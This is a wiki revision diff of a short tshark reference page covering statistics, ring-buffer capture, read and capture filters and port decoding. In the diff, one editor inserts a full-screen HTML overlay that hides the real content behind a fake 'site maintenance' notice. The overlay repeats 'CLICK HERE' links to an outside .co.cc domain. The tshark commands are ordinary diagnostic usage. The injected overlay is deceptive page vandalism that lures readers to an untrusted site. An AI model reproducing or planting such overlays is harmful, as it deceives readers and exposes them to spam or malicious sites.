Difference between revisions of "Tools/Tshark"
< Tools
(Namensänderung) |
Oxudocopaj (talk | contribs) |
||
| Line 1: | Line 1: | ||
| + | ---- | ||
| + | <div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;"> | ||
| + | ---- | ||
| + | =[http://ehiqikag.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]= | ||
| + | ---- | ||
| + | =[http://ehiqikag.co.cc CLICK HERE]= | ||
| + | ---- | ||
| + | </div> | ||
= Why tshark rocks = | = Why tshark rocks = | ||
* more functions than tcpdump | * more functions than tcpdump | ||
| Line 19: | Line 27: | ||
=== read filter (live capture, read capture file) === | === read filter (live capture, read capture file) === | ||
| − | tshark -r mm.cap -R "tcp.port!=50050&&ip.addr==172.17.23.5" -w clean.cap | + | tshark -r mm.cap -R "tcp.port!=50050&&ip.addr==172.17.23.5" -w clean.cap |
| − | -R "not(ip.addr==172.17.23.5&&tcp.len==0)" | + | -R "not(ip.addr==172.17.23.5&&tcp.len==0)" |
-R 'pop.request || http.request.method==GET || http.request.method=="POST"' | -R 'pop.request || http.request.method==GET || http.request.method=="POST"' | ||
Revision as of 02:18, 24 November 2010
Why tshark rocks
- more functions than tcpdump
- shares features with Wireshark
- lives in /usr/bin
- can capture to a ring buffer
- capture and read filters
tshark command lines
statistics
tshark -qz io,stat,0.01,ip.addr==172.17.23.1 tshark -qz conv,eth tshark -qz proto,colinfo,nfs tshark -qz sip,stat tshark -o "smb.sid_name_snooping:TRUE" -qz smb,sids
ring buffer capture
tshark -b 5 -a filesize:9728 -w mm.cap
read filter (live capture, read capture file)
tshark -r mm.cap -R "tcp.port!=50050&&ip.addr==172.17.23.5" -w clean.cap -R "not(ip.addr==172.17.23.5&&tcp.len==0)" -R 'pop.request || http.request.method==GET || http.request.method=="POST"'
capture filter (live capture)
-f not host 172.17.23.255
decode ports as specific service
tshark -d tcp.port==8888,http
